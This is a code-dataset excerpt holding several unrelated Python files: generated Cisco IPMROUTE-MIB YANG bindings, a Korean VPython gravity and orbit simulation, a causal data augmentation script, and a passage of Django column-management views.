self.ciscoipmroutenumberofentries = value\n self.ciscoipmroutenumberofentries.value_namespace = name_space\n self.ciscoipmroutenumberofentries.value_namespace_prefix = name_space_prefix\n\n\n class Ciscoipmrouteheartbeattable(Entity):\n \"\"\"\n The (conceptual) table listing sets of IP Multicast\n heartbeat parameters. If no IP Multicast heartbeat is\n configured, this table would be empty.\n \n .. attribute:: ciscoipmrouteheartbeatentry\n \n \tAn entry (conceptual row) representing a set of IP Multicast heartbeat parameters\n \t**type**\\: list of :py:class:`Ciscoipmrouteheartbeatentry `\n \n \n\n \"\"\"\n\n _prefix = 'CISCO-IPMROUTE-MIB'\n _revision = '2005-03-07'\n\n def __init__(self):\n super(CiscoIpmrouteMib.Ciscoipmrouteheartbeattable, self).__init__()\n\n self.yang_name = \"ciscoIpMRouteHeartBeatTable\"\n self.yang_parent_name = \"CISCO-IPMROUTE-MIB\"\n\n self.ciscoipmrouteheartbeatentry = YList(self)\n\n def __setattr__(self, name, value):\n self._check_monkey_patching_error(name, value)\n with _handle_type_error():\n if name in self.__dict__ and isinstance(self.__dict__[name], YList):\n raise YPYModelError(\"Attempt to assign value of '{}' to YList ldata. \"\n \"Please use list append or extend method.\"\n .format(value))\n if isinstance(value, Enum.YLeaf):\n value = value.name\n if name in () and name in self.__dict__:\n if isinstance(value, YLeaf):\n self.__dict__[name].set(value.get())\n elif isinstance(value, YLeafList):\n super(CiscoIpmrouteMib.Ciscoipmrouteheartbeattable, self).__setattr__(name, value)\n else:\n self.__dict__[name].set(value)\n else:\n if hasattr(value, \"parent\") and name != \"parent\":\n if hasattr(value, \"is_presence_container\") and value.is_presence_container:\n value.parent = self\n elif value.parent is None and value.yang_name in self._children_yang_names:\n value.parent = self\n super(CiscoIpmrouteMib.Ciscoipmrouteheartbeattable, self).__setattr__(name, value)\n\n\n class Ciscoipmrouteheartbeatentry(Entity):\n \"\"\"\n An entry (conceptual row) representing a set of IP\n Multicast heartbeat parameters.\n \n .. attribute:: ciscoipmrouteheartbeatgroupaddr \n \n \tMulticast group address used to receive heartbeat packets\n \t**type**\\: str\n \n \t**pattern:** (([0\\-9]\\|[1\\-9][0\\-9]\\|1[0\\-9][0\\-9]\\|2[0\\-4][0\\-9]\\|25[0\\-5])\\\\.){3}([0\\-9]\\|[1\\-9][0\\-9]\\|1[0\\-9][0\\-9]\\|2[0\\-4][0\\-9]\\|25[0\\-5])(%[\\\\p{N}\\\\p{L}]+)?\n \n .. attribute:: ciscoipmrouteheartbeatalerttime\n \n \tThe value of sysUpTime on the most recent occasion at which a missing IP multicast heartbeat condition occured for the group address specified in this entry. If no such condition have occurred since the last re\\-initialization of the local management subsystem, then this object contains a zero value\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n .. attribute:: ciscoipmrouteheartbeatcount\n \n \tNumber of time intervals where multicast packets were received in the last ciscoIpMRouteHeartBeatWindowSize intervals\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n .. attribute:: ciscoipmrouteheartbeatinterval\n \n \tNumber of seconds in which a Cisco multicast router expects a valid heartBeat packet from a source. This value must be a multiple of 10\n \t**type**\\: int\n \n \t**range:** 10..3600\n \n \t**units**\\: seconds\n \n .. attribute:: ciscoipmrouteheartbeatminimum\n \n \tThe minimal number of heartbeat packets expected in the last ciscoIpMRouteHeartBeatWindowSize intervals. If ciscoIpMRouteHeartBeatCount falls below this value, an SNMP trap/notification, if configured, will be sent to the NMS\n \t**type**\\: int\n \n \t**range:** 1..100\n \n .. attribute:: ciscoipmrouteheartbeatsourceaddr\n \n \tSource address of the last multicast heartbeat packet received\n \t**type**\\: str\n \n \t**pattern:** (([0\\-9]\\|[1\\-9][0\\-9]\\|1[0\\-9][0\\-9]\\|2[0\\-4][0\\-9]\\|25[0\\-5])\\\\.){3}([0\\-9]\\|[1\\-9][0\\-9]\\|1[0\\-9][0\\-9]\\|2[0\\-4][0\\-9]\\|25[0\\-5])(%[\\\\p{N}\\\\p{L}]+)?\n \n .. attribute:: ciscoipmrouteheartbeatstatus\n \n \tThis object is used to create a new row or delete an existing row in this table\n \t**type**\\: :py:class:`Rowstatus `\n \n .. attribute:: ciscoipmrouteheartbeatwindowsize\n \n \tNumber of ciscoIpMRouteHeartBeatInterval intervals a Cisco multicast router waits before checking if expected number of heartbeat packets are received or not\n \t**type**\\: int\n \n \t**range:** 1..100\n \n \n\n \"\"\"\n\n _prefix = 'CISCO-IPMROUTE-MIB'\n _revision = '2005-03-07'\n\n def __init__(self):\n super(CiscoIpmrouteMib.Ciscoipmrouteheartbeattable.Ciscoipmrouteheartbeatentry, self).__init__()\n\n self.yang_name = \"ciscoIpMRouteHeartBeatEntry\"\n self.yang_parent_name = \"ciscoIpMRouteHeartBeatTable\"\n\n self.ciscoipmrouteheartbeatgroupaddr = YLeaf(YType.str, \"ciscoIpMRouteHeartBeatGroupAddr\")\n\n self.ciscoipmrouteheartbeatalerttime = YLeaf(YType.uint32, \"ciscoIpMRouteHeartBeatAlertTime\")\n\n self.ciscoipmrouteheartbeatcount = YLeaf(YType.uint32, \"ciscoIpMRouteHeartBeatCount\")\n\n self.ciscoipmrouteheartbeatinterval = YLeaf(YType.int32, \"ciscoIpMRouteHeartBeatInterval\")\n\n self.ciscoipmrouteheartbeatminimum = YLeaf(YType.int32, \"ciscoIpMRouteHeartBeatMinimum\")\n\n self.ciscoipmrouteheartbeatsourceaddr = YLeaf(YType.str, \"ciscoIpMRouteHeartBeatSourceAddr\")\n\n self.ciscoipmrouteheartbeatstatus = YLeaf(YType.enumeration, \"ciscoIpMRouteHeartBeatStatus\")\n\n self.ciscoipmrouteheartbeatwindowsize = YLeaf(YType.int32, \"ciscoIpMRouteHeartBeatWindowSize\")\n\n def __setattr__(self, name, value):\n self._check_monkey_patching_error(name, value)\n with _handle_type_error():\n if name in self.__dict__ and isinstance(self.__dict__[name], YList):\n raise YPYModelError(\"Attempt to assign value of '{}' to YList ldata. \"\n \"Please use list append or extend method.\"\n .format(value))\n if isinstance(value, Enum.YLeaf):\n value = value.name\n if name in (\"ciscoipmrouteheartbeatgroupaddr\",\n \"ciscoipmrouteheartbeatalerttime\",\n \"ciscoipmrouteheartbeatcount\",\n \"ciscoipmrouteheartbeatinterval\",\n \"ciscoipmrouteheartbeatminimum\",\n \"ciscoipmrouteheartbeatsourceaddr\",\n \"ciscoipmrouteheartbeatstatus\",\n \"ciscoipmrouteheartbeatwindowsize\") and name in self.__dict__:\n if isinstance(value, YLeaf):\n self.__dict__[name].set(value.get())\n elif isinstance(value, YLeafList):\n super(CiscoIpmrouteMib.Ciscoipmrouteheartbeattable.Ciscoipmrouteheartbeatentry, self).__setattr__(name, value)\n else:\n self.__dict__[name].set(value)\n else:\n if hasattr(value, \"parent\") and name != \"parent\":\n if hasattr(value, \"is_presence_container\") and value.is_presence_container:\n value.parent = self\n elif value.parent is None and value.yang_name in self._children_yang_names:\n value.parent = self\n super(CiscoIpmrouteMib.Ciscoipmrouteheartbeattable.Ciscoipmrouteheartbeatentry, self).__setattr__(name, value)\n\n def has_data(self):\n return (\n self.ciscoipmrouteheartbeatgroupaddr.is_set or\n self.ciscoipmrouteheartbeatalerttime.is_set or\n self.ciscoipmrouteheartbeatcount.is_set or\n self.ciscoipmrouteheartbeatinterval.is_set or\n self.ciscoipmrouteheartbeatminimum.is_set or\n self.ciscoipmrouteheartbeatsourceaddr.is_set or\n self.ciscoipmrouteheartbeatstatus.is_set or\n self.ciscoipmrouteheartbeatwindowsize.is_set)\n\n def has_operation(self):\n return (\n self.yfilter != YFilter.not_set or\n self.ciscoipmrouteheartbeatgroupaddr.yfilter != YFilter.not_set or\n self.ciscoipmrouteheartbeatalerttime.yfilter != YFilter.not_set or\n self.ciscoipmrouteheartbeatcount.yfilter != YFilter.not_set or\n self.ciscoipmrouteheartbeatinterval.yfilter != YFilter.not_set or\n self.ciscoipmrouteheartbeatminimum.yfilter != YFilter.not_set or\n self.ciscoipmrouteheartbeatsourceaddr.yfilter != YFilter.not_set or\n self.ciscoipmrouteheartbeatstatus.yfilter != YFilter.not_set or\n self.ciscoipmrouteheartbeatwindowsize.yfilter != YFilter.not_set)\n\n def get_segment_path(self):\n path_buffer = \"\"\n path_buffer = \"ciscoIpMRouteHeartBeatEntry\" + \"[ciscoIpMRouteHeartBeatGroupAddr='\" + self.ciscoipmrouteheartbeatgroupaddr.get() + \"']\" + path_buffer\n\n return path_buffer\n\n def get_entity_path(self, ancestor):\n path_buffer = \"\"\n if (ancestor is None):\n path_buffer = \"CISCO-IPMROUTE-MIB:CISCO-IPMROUTE-MIB/ciscoIpMRouteHeartBeatTable/%s\" % self.get_segment_path()\n else:\n path_buffer = _get_relative_entity_path(self, ancestor, path_buffer)\n\n leaf_name_data = LeafDataList()\n if (self.ciscoipmrouteheartbeatgroupaddr.is_set or self.ciscoipmrouteheartbeatgroupaddr.yfilter != YFilter.not_set):\n leaf_name_data.append(self.ciscoipmrouteheartbeatgroupaddr.get_name_leafdata())\n if (self.ciscoipmrouteheartbeatalerttime.is_set or self.ciscoipmrouteheartbeatalerttime.yfilter != YFilter.not_set):\n leaf_name_data.append(self.ciscoipmrouteheartbeatalerttime.get_name_leafdata())\n if (self.ciscoipmrouteheartbeatcount.is_set or self.ciscoipmrouteheartbeatcount.yfilter != YFilter.not_set):\n leaf_name_data.append(self.ciscoipmrouteheartbeatcount.get_name_leafdata())\n if (self.ciscoipmrouteheartbeatinterval.is_set or self.ciscoipmrouteheartbeatinterval.yfilter != YFilter.not_set):\n leaf_name_data.append(self.ciscoipmrouteheartbeatinterval.get_name_leafdata())\n if (self.ciscoipmrouteheartbeatminimum.is_set or self.ciscoipmrouteheartbeatminimum.yfilter != YFilter.not_set):\n leaf_name_data.append(self.ciscoipmrouteheartbeatminimum.get_name_leafdata())\n if (self.ciscoipmrouteheartbeatsourceaddr.is_set or self.ciscoipmrouteheartbeatsourceaddr.yfilter != YFilter.not_set):\n leaf_name_data.append(self.ciscoipmrouteheartbeatsourceaddr.get_name_leafdata())\n if (self.ciscoipmrouteheartbeatstatus.is_set or self.ciscoipmrouteheartbeatstatus.yfilter != YFilter.not_set):\n leaf_name_data.append(self.ciscoipmrouteheartbeatstatus.get_name_leafdata())\n if (self.ciscoipmrouteheartbeatwindowsize.is_set or self.ciscoipmrouteheartbeatwindowsize.yfilter != YFilter.not_set):\n leaf_name_data.append(self.ciscoipmrouteheartbeatwindowsize.get_name_leafdata())\n\n entity_path = EntityPath(path_buffer, leaf_name_data)\n return entity_path\n\n def get_child_by_name(self, child_yang_name, segment_path):\n child = self._get_child_by_seg_name([child_yang_name, segment_path])\n if child is not None:\n return child\n\n return None\n\n def has_leaf_or_child_of_name(self, name):\n if(name == \"ciscoIpMRouteHeartBeatGroupAddr\" or name == \"ciscoIpMRouteHeartBeatAlertTime\" or name == \"ciscoIpMRouteHeartBeatCount\" or name == \"ciscoIpMRouteHeartBeatInterval\" or name == \"ciscoIpMRouteHeartBeatMinimum\" or name == \"ciscoIpMRouteHeartBeatSourceAddr\" or name == \"ciscoIpMRouteHeartBeatStatus\" or name == \"ciscoIpMRouteHeartBeatWindowSize\"):\n return True\n return False\n\n def set_value(self, value_path, value, name_space, name_space_prefix):\n if(value_path == \"ciscoIpMRouteHeartBeatGroupAddr\"):\n self.ciscoipmrouteheartbeatgroupaddr = value\n self.ciscoipmrouteheartbeatgroupaddr.value_namespace = name_space\n self.ciscoipmrouteheartbeatgroupaddr.value_namespace_prefix = name_space_prefix\n if(value_path == \"ciscoIpMRouteHeartBeatAlertTime\"):\n self.ciscoipmrouteheartbeatalerttime = value\n self.ciscoipmrouteheartbeatalerttime.value_namespace = name_space\n self.ciscoipmrouteheartbeatalerttime.value_namespace_prefix = name_space_prefix\n if(value_path == \"ciscoIpMRouteHeartBeatCount\"):\n self.ciscoipmrouteheartbeatcount = value\n self.ciscoipmrouteheartbeatcount.value_namespace = name_space\n self.ciscoipmrouteheartbeatcount.value_namespace_prefix = name_space_prefix\n if(value_path == \"ciscoIpMRouteHeartBeatInterval\"):\n self.ciscoipmrouteheartbeatinterval = value\n self.ciscoipmrouteheartbeatinterval.value_namespace = name_space\n self.ciscoipmrouteheartbeatinterval.value_namespace_prefix = name_space_prefix\n if(value_path == \"ciscoIpMRouteHeartBeatMinimum\"):\n self.ciscoipmrouteheartbeatminimum = value\n self.ciscoipmrouteheartbeatminimum.value_namespace = name_space\n self.ciscoipmrouteheartbeatminimum.value_namespace_prefix = name_space_prefix\n if(value_path == \"ciscoIpMRouteHeartBeatSourceAddr\"):\n self.ciscoipmrouteheartbeatsourceaddr = value\n self.ciscoipmrouteheartbeatsourceaddr.value_namespace = name_space\n self.ciscoipmrouteheartbeatsourceaddr.value_namespace_prefix = name_space_prefix\n if(value_path == \"ciscoIpMRouteHeartBeatStatus\"):\n self.ciscoipmrouteheartbeatstatus = value\n self.ciscoipmrouteheartbeatstatus.value_namespace = name_space\n self.ciscoipmrouteheartbeatstatus.value_namespace_prefix = name_space_prefix\n if(value_path == \"ciscoIpMRouteHeartBeatWindowSize\"):\n self.ciscoipmrouteheartbeatwindowsize = value\n self.ciscoipmrouteheartbeatwindowsize.value_namespace = name_space\n self.ciscoipmrouteheartbeatwindowsize.value_namespace_prefix = name_space_prefix\n\n def has_data(self):\n for c in self.ciscoipmrouteheartbeatentry:\n if (c.has_data()):\n return True\n return False\n\n def has_operation(self):\n for c in self.ciscoipmrouteheartbeatentry:\n if (c.has_operation()):\n return True\n return self.yfilter != YFilter.not_set\n\n def get_segment_path(self):\n path_buffer = \"\"\n path_buffer = \"ciscoIpMRouteHeartBeatTable\" + path_buffer\n\n return path_buffer\n\n def get_entity_path(self, ancestor):\n path_buffer = \"\"\n if (ancestor is None):\n path_buffer = \"CISCO-IPMROUTE-MIB:CISCO-IPMROUTE-MIB/%s\" % self.get_segment_path()\n else:\n path_buffer = _get_relative_entity_path(self, ancestor, path_buffer)\n\n leaf_name_data = LeafDataList()\n\n entity_path = EntityPath(path_buffer, leaf_name_data)\n return entity_path\n\n def get_child_by_name(self, child_yang_name, segment_path):\n child = self._get_child_by_seg_name([child_yang_name, segment_path])\n if child is not None:\n return child\n\n if (child_yang_name == \"ciscoIpMRouteHeartBeatEntry\"):\n for c in self.ciscoipmrouteheartbeatentry:\n segment = c.get_segment_path()\n if (segment_path == segment):\n return c\n c = CiscoIpmrouteMib.Ciscoipmrouteheartbeattable.Ciscoipmrouteheartbeatentry()\n c.parent = self\n local_reference_key = \"ydk::seg::%s\" % segment_path\n self._local_refs[local_reference_key] = c\n self.ciscoipmrouteheartbeatentry.append(c)\n return c\n\n return None\n\n def has_leaf_or_child_of_name(self, name):\n if(name == \"ciscoIpMRouteHeartBeatEntry\"):\n return True\n return False\n\n def set_value(self, value_path, value, name_space, name_space_prefix):\n pass\n\n def has_data(self):\n return (\n (self.ciscoipmroute is not None and self.ciscoipmroute.has_data()) or\n (self.ciscoipmrouteheartbeattable is not None and self.ciscoipmrouteheartbeattable.has_data()))\n\n def has_operation(self):\n return (\n self.yfilter != YFilter.not_set or\n (self.ciscoipmroute is not None and self.ciscoipmroute.has_operation()) or\n (self.ciscoipmrouteheartbeattable is not None and self.ciscoipmrouteheartbeattable.has_operation()))\n\n def get_segment_path(self):\n path_buffer = \"\"\n path_buffer = \"CISCO-IPMROUTE-MIB:CISCO-IPMROUTE-MIB\" + path_buffer\n\n return path_buffer\n\n def get_entity_path(self, ancestor):\n path_buffer = \"\"\n if (not ancestor is None):\n raise YPYModelError(\"ancestor has to be None for top-level node\")\n\n path_buffer = self.get_segment_path()\n leaf_name_data = LeafDataList()\n\n entity_path = EntityPath(path_buffer, leaf_name_data)\n return entity_path\n\n def get_child_by_name(self, child_yang_name, segment_path):\n child = self._get_child_by_seg_name([child_yang_name, segment_path])\n if child is not None:\n return child\n\n if (child_yang_name == \"ciscoIpMRoute\"):\n if (self.ciscoipmroute is None):\n self.ciscoipmroute = CiscoIpmrouteMib.Ciscoipmroute()\n self.ciscoipmroute.parent = self\n self._children_name_map[\"ciscoipmroute\"] = \"ciscoIpMRoute\"\n return self.ciscoipmroute\n\n if (child_yang_name == \"ciscoIpMRouteHeartBeatTable\"):\n if (self.ciscoipmrouteheartbeattable is None):\n self.ciscoipmrouteheartbeattable = CiscoIpmrouteMib.Ciscoipmrouteheartbeattable()\n self.ciscoipmrouteheartbeattable.parent = self\n self._children_name_map[\"ciscoipmrouteheartbeattable\"] = \"ciscoIpMRouteHeartBeatTable\"\n return self.ciscoipmrouteheartbeattable\n\n return None\n\n def has_leaf_or_child_of_name(self, name):\n if(name == \"ciscoIpMRoute\" or name == \"ciscoIpMRouteHeartBeatTable\"):\n return True\n return False\n\n def set_value(self, value_path, value, name_space, name_space_prefix):\n pass\n\n def clone_ptr(self):\n self._top_entity = CiscoIpmrouteMib()\n return self._top_entity\n\n","repo_name":"juancsosap/yangtraining","sub_path":"tools/ydk-py-master/cisco-ios-xe/ydk/models/cisco_ios_xe/CISCO_IPMROUTE_MIB.py","file_name":"CISCO_IPMROUTE_MIB.py","file_ext":"py","file_size_in_byte":26626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19014570064","text":"from vpython import *\n#GlowScript 3.0 VPython\n\n# 화면 설정\nscene.range = 20000\n\n# 크기 조정을 위한 변수\nsf = 10000\nsf_e = 1\n\n# 지구, 사과 만들기\nearth = sphere(pos = vec(0,-6400000,0), radius = sf_e*6400000, color = color.blue) \napple = sphere(pos = vec(0,1000,0), radius = sf*0.1, color = color.red, make_trail = True) \n\n# 물리 성질 & 상수 초기화\napple.m = 0.1 #사과 질량 ##kg\napple.v = vec(7900,0,0) #사과 초기 속도 ##m/s\nearth.m = 5.98e24 #지구 질량 \nearth.v = vec(0,0,0) #지구 초기 속도\nG = 6.67e-11 #중력상수 ##N*m**2/kg**2\n\n# 시간 설정\nt = 0 ##s\ndt = 1 ##s\n\n# 시뮬레이션 루프\nwhile t < 10000:\n rate(10000)\n \n # 만유인력\n F = -G*earth.m*apple.m/mag(earth.pos-apple.pos)**2*norm(earth.pos-apple.pos)\n \n # 뉴턴 제 3법칙 적용 (작용 반작용)\n earth.force = F\n apple.force = -F\n\n # 속도, 위치 업데이트\n apple.v = apple.v + apple.force/apple.m*dt\n earth.v = earth.v + earth.force/earth.m*dt\n apple.pos = apple.pos + apple.v*dt\n earth.pos = earth.pos + earth.v*dt\n \n print(t/3600,\":\",mag(apple.pos-earth.pos)) #출력\n\n scene.center = apple.pos #화면 업데이트\n\n # 시간 업데이트\n t += dt\n","repo_name":"zoonature/Physics_programmed_by_python","sub_path":"ex3-2-2-지구중력과 사과의 궤도 운동.py","file_name":"ex3-2-2-지구중력과 사과의 궤도 운동.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24761451162","text":"import yaml\nimport pandas as pd\nimport numpy as np\nfrom copy import deepcopy\nfrom typing import Tuple\nimport argparse\nfrom ananke.graphs import ADMG\nfrom pathlib import Path\nfrom causal_data_augmentation.causal_data_augmentation.api import (\n AugmenterConfig, EagerCausalDataAugmentation, FullAugmentKind\n)\nfrom causal_data_augmentation.api_support.experiments.logging.pickler import Pickler\nimport causal_data_augmentation.causal_data_augmentation.api_support.method_config as method_config_module\n\n\n\ndef apply_augmenter(augmenter_config: AugmenterConfig, \n method: EagerCausalDataAugmentation, \n data: pd.DataFrame, \n admg: ADMG) -> Tuple[pd.DataFrame, np.ndarray]:\n \"\"\"Perform the augmentation using the augmenter configured by ``augmenter_config``.\n\n Parameters:\n augmenter_config : Method configuration.\n method : Instantiated method object.\n data : Data to be augmented.\n admg : ADMG to be used for the augmentation.\n\n Returns:\n Tuple containing\n\n - augmented_data : The augmented data DataFrame.\n - aug_weights : The instance weights corresponding to the augmented data.\n \"\"\"\n if isinstance(augmenter_config, FullAugmentKind):\n augmented_data, aug_weights = method.augment(data, admg)\n aug_weights = aug_weights.flatten()\n else:\n raise NotImplementedError()\n\n return augmented_data, aug_weights\n\n\ndef _augment(data: pd.DataFrame, \n graph, \n augmenter_config: AugmenterConfig, \n data_cache_base_path, \n data_cache_name) -> Tuple[pd.DataFrame, np.ndarray]:\n \"\"\"Instantiate the method and perform the data augmentation.\n\n Parameters:\n data : Data to be augmented.\n graph : ADMG to be used for the augmentation.\n augmenter_config : Method configuration.\n data_cache_base_path: The path to the folder to save the trained model and the augmented data\n data_cache_name: The base name that the saved files should follow (it contains the experiment settings)\n\n Returns:\n Tuple containing\n\n - augmented_data : The augmented data DataFrame.\n - aug_weights : The instance weights corresponding to the augmented data.\n \"\"\"\n vertices, di_edges, bi_edges = graph\n admg = ADMG(vertices, di_edges=di_edges, bi_edges=bi_edges)\n method = EagerCausalDataAugmentation(data_cache_base_path, data_cache_name, augmenter_config)\n\n # Augment\n augmented_data, aug_weights = apply_augmenter(\n augmenter_config, method, data, admg)\n return augmented_data, aug_weights\n\n\ndef run_method(data: pd.DataFrame, \n graph,\n predicted_var_name: str,\n predictor_model,\n augmenter_config: AugmenterConfig,\n aug_coeff,\n fit_to_aug_only,\n data_cache_base_path, \n data_cache_name):\n \"\"\"Run the method and record the results.\n\n Parameters:\n data: The data to be augmented.\n graph: The ADMG object used for performing the augmentation.\n predicted_var_name: The name of the predicted variable.\n predictor_model: Trainable predictor model to be trained on the augmented data. Should implement ``fit()`` and ``predict()``.\n augmenter_config: AugmenterConfig,\n aug_coeff: Regularization term in for the augmented data\n fit_to_aug_only: Whether or not to fit the models only to the augmented data\n data_cache_base_path: The path to the folder to save the trained model and the augmented data\n data_cache_name: The base name the saved files should follow (it contains the experiment settings)\n \n Returns:\n List of trained models\n \"\"\"\n # Augment data\n augmented_data, aug_weights = _augment(data, graph, augmenter_config, data_cache_base_path, data_cache_name)\n \n # Save augmented data and weights \n augmented_data_to_save_df = augmented_data.copy()\n augmented_data_to_save_df['aug_weights'] = aug_weights\n _augmented_data_pickler = Pickler(data_cache_name + \"_augmented\", data_cache_base_path)\n _augmented_data_pickler.save(augmented_data_to_save_df)\n \n # self._measure_augmentation(augmented_data, aug_weights, data))\n\n model_list = []\n predictor = deepcopy(predictor_model)\n for aug_coeff in aug_coeff:\n # Perform training\n if fit_to_aug_only:\n augmented_data = None\n orig_weights = np.zeros(len(data))\n else:\n X = np.array(data.drop(predicted_var_name, axis=1))\n Y = np.array(data[[predicted_var_name]])\n aug_X = np.array(augmented_data.drop(predicted_var_name, axis=1))\n aug_Y = np.array(augmented_data[[predicted_var_name]])\n orig_weights = np.ones(len(data)) / len(data)\n if aug_weights.size > 0:\n orig_weights *= 1 - aug_coeff\n aug_weights *= aug_coeff\n\n orig_weights *= len(data)\n aug_weights *= len(data)\n\n predictor.fit(data, augmented_data, orig_weights, aug_weights)\n model_list.append(predictor.model)\n return model_list\n\ndef main(df: pd.DataFrame, graph, augment_config):\n data_cache_base_path = ''\n data_cache_base_path = Path(data_cache_base_path)\n data_cache_name = 'simu_test'\n\n # Intermediate arguments\n augmenter_config_name = 'FullAugment'\n AugmenterConfigClass = getattr(method_config_module, augmenter_config_name)\n augmenter_config_ok = AugmenterConfigClass(**augmenter_config)\n method = EagerCausalDataAugmentation(data_cache_base_path,\n data_cache_name,\n augmenter_config_ok)\n\n vertices, di_edges, bi_edges = graph\n admg = ADMG(vertices, di_edges=di_edges, bi_edges=bi_edges)\n dag_image = admg.draw()\n\n aug_data, aug_weights = _augment(data, \n graph,\n augmenter_config_ok, \n data_cache_base_path, \n data_cache_name)\n aug_data_to_print = aug_data.copy()\n aug_data_to_print['weight'] = aug_weights*data.shape[0]\n print(aug_data_to_print)\n print(aug_data_to_print['weight'].sum()) \n return aug_data_to_print, dag_image\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config\", required=True, help=\"yaml config file\")\n parser.add_argument(\"--table\", required=True, help=\"csv data file\")\n args = parser.parse_args()\n result_dir = Path('./result')\n\n with open(args.config) as file:\n config = yaml.safe_load(file)\n augmenter_config = config['augmenter_config']\n admg_config = config['admg_config']\n vertices = admg_config['vertices']\n di_edges = admg_config['di_edges']\n bi_edges = admg_config['bi_edges']\n predicted_var_name = admg_config['predicted_var_name']\n\n data = pd.read_csv(args.table) \n\n aug_data, dag_image = main(data, (vertices, di_edges, bi_edges), augmenter_config)\n aug_data.to_csv(result_dir / f'augmented_{args.table}', index=None)\n dag_image.render(result_dir / f'ADMG_{args.table}')","repo_name":"macostrail/causalDA","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73694531024","text":"\"\"\"Views for create/rename/update/delete columns.\"\"\"\n\nfrom django import http\nfrom django.contrib import messages\nfrom django.template.loader import render_to_string\nfrom django.urls import reverse\nfrom django.utils.decorators import method_decorator\nfrom django.utils.translation import gettext_lazy as _\nfrom django.views import generic\n\nfrom ontask import OnTaskServiceException, models\nfrom ontask.column import forms, services\nfrom ontask.core import (\n ActionView, ColumnView, JSONFormResponseMixin, UserIsInstructor,\n ajax_required)\n\n# These are the column operands offered through the GUI. They have immediate\n# translations onto Pandas operators over dataframes. Each tuple has:\n# - Pandas operation name\n# - Textual description\n# - List of data types that are allowed (for data type checking)\n_formula_column_operands = [\n ('sum', _('sum: Sum selected columns'), ['integer', 'double']),\n (\n 'prod',\n _('prod: Product of the selected columns'),\n ['integer', 'double']),\n ('max', _('max: Maximum of the selected columns'), ['integer', 'double']),\n ('min', _('min: Minimum of the selected columns'), ['integer', 'double']),\n ('mean', _('mean: Mean of the selected columns'), ['integer', 'double']),\n (\n 'median',\n _('median: Median of the selected columns'),\n ['integer', 'double']),\n (\n 'std',\n _('std: Standard deviation over the selected columns'),\n ['integer', 'double']),\n (\n 'all',\n _('all: True when all elements in selected columns are true'),\n ['boolean']),\n (\n 'any',\n _('any: True when any element in selected columns is true'),\n ['boolean']),\n]\n\n\n@method_decorator(ajax_required, name='dispatch')\nclass ColumnBasicView(UserIsInstructor, JSONFormResponseMixin):\n \"\"\"Basic Column View.\"\"\"\n\n http_method_names = ['get', 'post']\n form_class = None\n template_name = None\n\n def get(\n self,\n request: http.HttpRequest,\n *args,\n **kwargs\n ) -> http.JsonResponse:\n \"\"\"Check if the workflow has no rows\"\"\"\n if self.workflow.nrows == 0:\n messages.error(\n request,\n _('Cannot add column to a workflow without data'),\n )\n return http.JsonResponse({'html_redirect': ''})\n\n return super().get(request, *args, **kwargs)\n\n\nclass ColumnCreateView(ColumnBasicView, ColumnView, generic.CreateView):\n \"\"\"Add a column.\"\"\"\n\n form_class = forms.ColumnAddForm\n template_name = 'column/includes/partial_add_edit.html'\n\n def get_context_data(self, **kwargs):\n \"\"\"Insert is_question and add values.\"\"\"\n context = super().get_context_data(**kwargs)\n context.update({'is_question': False, 'add': True})\n return context\n\n def get_form_kwargs(self):\n \"\"\"Add the workflow to the kwargs.\"\"\"\n kwargs = super().get_form_kwargs()\n kwargs['workflow'] = self.workflow\n return kwargs\n\n def form_valid(self, form):\n # Save the column object attached to the form\n column = form.save(commit=False)\n try:\n services.add_column_to_workflow(\n self.request.user,\n self.workflow,\n column,\n form.initial_valid_value)\n form.save_m2m()\n except OnTaskServiceException as exc:\n exc.message_to_error(self.request)\n exc.delete()\n\n return http.JsonResponse({'html_redirect': ''})\n\n\nclass ColumnQuestionAddView(ColumnBasicView, ActionView, generic.FormView):\n \"\"\"Add a new column to a survey action.\"\"\"\n\n form_class = forms.QuestionForm\n template_name = 'column/includes/partial_question_add_edit.html'\n\n def get_form_kwargs(self):\n \"\"\"Add the workflow to the kwargs.\"\"\"\n kwargs = super().get_form_kwargs()\n kwargs['workflow'] = self.workflow\n return kwargs\n\n def get_context_data(self, **kwargs):\n \"\"\"Insert is_question and add values.\"\"\"\n self.object = self.get_object()\n context = super().get_context_data(**kwargs)\n context['add'] = True\n return context\n\n def form_valid(self, form):\n # Get the action first\n action = self.get_object()\n\n # Save the column object attached to the form\n column = form.save(commit=False)\n try:\n services.add_column_to_workflow(\n self.request.user,\n self.workflow,\n column,\n form.initial_valid_value,\n models.Log.ACTION_QUESTION_ADD,\n action)\n form.save_m2m()\n except OnTaskServiceException as exc:\n exc.message_to_error(self.request)\n exc.delete()\n\n return http.JsonResponse({'html_redirect': ''})\n\n\nclass ColumnTODOAddView(ColumnBasicView, ActionView, generic.FormView):\n \"\"\"Add a new todo item to an action.\"\"\"\n\n form_class = forms.TODOItemForm\n template_name = 'column/includes/partial_todoitem_add_edit.html'\n\n def get_context_data(self, **kwargs):\n \"\"\"Insert is_question and add values.\"\"\"\n self.object = self.get_object()\n context = super().get_context_data(**kwargs)\n context['add'] = True\n return context\n\n def get_form_kwargs(self):\n \"\"\"Add the workflow to the kwargs.\"\"\"\n kwargs = super().get_form_kwargs()\n kwargs['workflow'] = self.workflow\n return kwargs\n\n def form_valid(self, form):\n # Save the column object attached to the form\n column = form.save(commit=False)\n try:\n services.add_column_to_workflow(\n self.request.user,\n self.workflow,\n column,\n form.initial_valid_value,\n models.Log.ACTION_TODOITEM_ADD,\n self.action)\n form.save_m2m()\n except OnTaskServiceException as exc:\n exc.message_to_error(self.request)\n exc.delete()\n\n return http.JsonResponse({'html_redirect': ''})\n\n\nclass ColumnFormulaAddView(ColumnBasicView, ColumnView, generic.CreateView):\n \"\"\"Add a new formula column.\"\"\"\n\n form_class = forms.FormulaColumnAddForm\n template_name = 'column/includes/partial_formula_add.html'\n wf_pf_selected = 'columns'\n\n def get_form_kwargs(self):\n \"\"\"Add the workflow to the kwargs.\"\"\"\n kwargs = super().get_form_kwargs()\n 